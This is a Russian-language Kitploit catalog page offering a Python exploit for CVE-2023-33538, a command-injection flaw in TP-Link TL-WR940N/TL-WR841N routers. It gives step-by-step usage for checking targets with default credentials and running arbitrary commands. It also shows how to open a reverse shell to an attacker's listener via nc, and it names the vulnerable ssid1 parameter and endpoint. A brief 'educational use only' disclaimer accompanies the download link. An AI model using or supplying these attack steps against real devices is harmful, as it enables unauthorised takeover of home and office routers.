Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/explxx/cve-2023-33538
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность беспроводных сетейТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubexplxx/cve-2023-33538

CVE-2023-33538

Эксплоит на Python для уязвимости внедрения команд в TP-Link TL-WR940N/TL-WR841N

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Python Exploit для уязвимости внедрения команд в TP-Link TL-WR940N/TL-WR841N

Инструкция по использованию

  1. Базовая проверка уязвимости:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. Выполнение произвольной команды:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "ваша_команда_здесь"
    
  3. Реверс-шелл (предварительно запустите слушатель с помощью nc -lvnp 4444):

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost ВАШ_IP --lport 4444
    

Важные примечания:

  • Эти скрипты предназначены только для образовательных целей и тестирования
  • Перед тестированием любой системы всегда получайте соответствующее разрешение
  • Команда перезагрузки используется по умолчанию, поскольку она не наносит вреда и легко проверяется
  • Реверс-шелл может не работать на всех версиях прошивки, так как это зависит от доступных бинарных файлов
  • Некоторые версии прошивки требуют случайного пути в URL, который скрипт пытается определить автоматически

Уязвимость существует из-за некорректной санитизации входных данных в параметре ssid1 конечной точки /userRpm/WlanNetworkRpm.htm, что позволяет внедрять команды через специально сформированные запросы.

Скачать инструмент